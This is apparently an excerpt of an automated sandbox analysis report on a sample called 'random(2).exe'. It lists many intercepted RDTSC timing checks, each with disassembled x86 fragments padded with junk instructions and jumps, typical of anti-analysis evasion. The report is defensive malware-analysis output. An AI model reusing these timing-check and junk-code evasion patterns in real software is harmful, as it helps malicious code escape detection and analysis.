              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 60B1EF second address: 60B1F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 612412 second address: 612425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F29453582DEh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 612425 second address: 61244D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F2944535536h 0x00000009 jmp 00007F2944535547h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 61244D second address: 612451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6111E3 second address: 6111ED instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2944535536h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6111ED second address: 611205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F29453582DEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 611205 second address: 611209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6118AD second address: 6118B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6118B8 second address: 6118BE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6118BE second address: 6118C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6119D4 second address: 6119D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 611C93 second address: 611CA0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F29453582D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 611F1A second address: 611F37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535549h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 611F37 second address: 611F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 611F3D second address: 611F60 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2944535546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F2944535558h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 611F60 second address: 611F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F29453582D6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c jnl 00007F29453582D6h 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6120C8 second address: 612105 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535543h 0x00000007 push esi 0x00000008 jmp 00007F294453553Ch 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 jl 00007F2944535544h 0x00000017 jmp 00007F294453553Eh 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 615A51 second address: 615A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 61D1FD second address: 61D219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 jmp 00007F2944535545h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 61D219 second address: 61D21E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 61D21E second address: 61D224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 61D224 second address: 61D235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29453582DBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 61D235 second address: 61D23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 61BF57 second address: 61BF5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 61BF5D second address: 61BF63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 61BF63 second address: 61BF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 61C4B4 second address: 61C4B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 61C4B8 second address: 61C4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 61C8FA second address: 61C914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F294453553Fh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 61CA9A second address: 61CAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 61CAA0 second address: 61CAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 61CAA4 second address: 61CAA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5C2E11 second address: 5C2E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 61D09B second address: 61D09F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 61D09F second address: 61D0AF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F2944535536h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 622083 second address: 6220A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F29453582E5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F29453582E2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6220A6 second address: 6220AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 622418 second address: 62241F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6226DC second address: 6226EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jg 00007F2944535536h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6226EC second address: 6226F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 623032 second address: 623038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 623038 second address: 623041 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DFFDA second address: 5DFFE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DFFE0 second address: 5DFFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E0575 second address: 5E0598 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F2944535543h 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E0598 second address: 5E059E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E059E second address: 5E05C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E0768 second address: 5E076C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E076C second address: 5E0796 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], esi 0x00000009 or cx, 4F13h 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F2944535546h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E0A56 second address: 5E0A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F29453582D8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 push edx 0x00000022 movzx ecx, bx 0x00000025 pop ecx 0x00000026 push 00000004h 0x00000028 adc edi, 1B2D94B8h 0x0000002e push eax 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E0FB9 second address: 5E0FBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E0FBF second address: 5E0FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E0FC3 second address: 5E0FC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E120C second address: 5E125F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 adc cl, 0000001Ch 0x0000000c lea eax, dword ptr [ebp+12486CCDh] 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F29453582D8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c stc 0x0000002d nop 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 jnc 00007F29453582D6h 0x00000037 jmp 00007F29453582E2h 0x0000003c popad 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E125F second address: 5E1265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E1265 second address: 5E1276 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29453582D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E1276 second address: 5C2E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 nop 0x00000007 sub dword ptr [ebp+122D1A22h], edi 0x0000000d lea eax, dword ptr [ebp+12486C89h] 0x00000013 mov dl, bh 0x00000015 push eax 0x00000016 jno 00007F294453553Ah 0x0000001c mov dword ptr [esp], eax 0x0000001f mov ecx, dword ptr [ebp+122D3696h] 0x00000025 call dword ptr [ebp+122D1AADh] 0x0000002b push edx 0x0000002c jnc 00007F2944535538h 0x00000032 push eax 0x00000033 push edx 0x00000034 jc 00007F2944535536h 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 629F5F second address: 629F64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 62D6DC second address: 62D6E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 62D6E2 second address: 62D70D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F29453582DEh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F29453582E9h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 62D871 second address: 62D87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2944535538h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 62D87D second address: 62D893 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29453582E1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 62DA1D second address: 62DA27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 62DA27 second address: 62DA2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 62DA2D second address: 62DA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 62DB4F second address: 62DB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29453582E2h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 62DB65 second address: 62DB69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 58CA54 second address: 58CA5E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 634871 second address: 63488A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jmp 00007F2944535541h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 639750 second address: 63975A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F29453582D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 63975A second address: 639785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F294453553Ch 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F2944535542h 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 639B54 second address: 639B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F29453582D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 639B5E second address: 639B67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 639CDC second address: 639CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29453582DAh 0x00000009 jp 00007F29453582D6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 639E33 second address: 639E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2944535541h 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E0C47 second address: 5E0CAC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F29453582D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F29453582D8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D178Dh], esi 0x0000002b mov ebx, dword ptr [ebp+12486CC8h] 0x00000031 mov ecx, dword ptr [ebp+122D373Ah] 0x00000037 add eax, ebx 0x00000039 sbb dl, FFFFFFE8h 0x0000003c jmp 00007F29453582E7h 0x00000041 nop 0x00000042 jo 00007F29453582E0h 0x00000048 pushad 0x00000049 push esi 0x0000004a pop esi 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 639F7C second address: 639F8C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F2944535536h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 639F8C second address: 639F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 639F90 second address: 639F94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 63A0E3 second address: 63A0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 63C695 second address: 63C699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 640994 second address: 6409BB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29453582D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jne 00007F29453582E8h 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6409BB second address: 6409DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F2944535546h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6409DA second address: 6409DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 63FD3E second address: 63FD60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F2944535536h 0x0000000b jmp 00007F294453553Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F2944535536h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 63FD60 second address: 63FD9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007F29453582EAh 0x0000000f jmp 00007F29453582E4h 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007F29453582D6h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 63FD9F second address: 63FDA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64007A second address: 64009D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F29453582F0h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 640564 second address: 640582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F294453553Ch 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007F2944535536h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64886F second address: 648875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 648875 second address: 648879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 648879 second address: 64887F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64887F second address: 64888B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64888B second address: 648893 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 646C2A second address: 646C3E instructions: 0x00000000 rdtsc 0x00000002 je 00007F2944535536h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
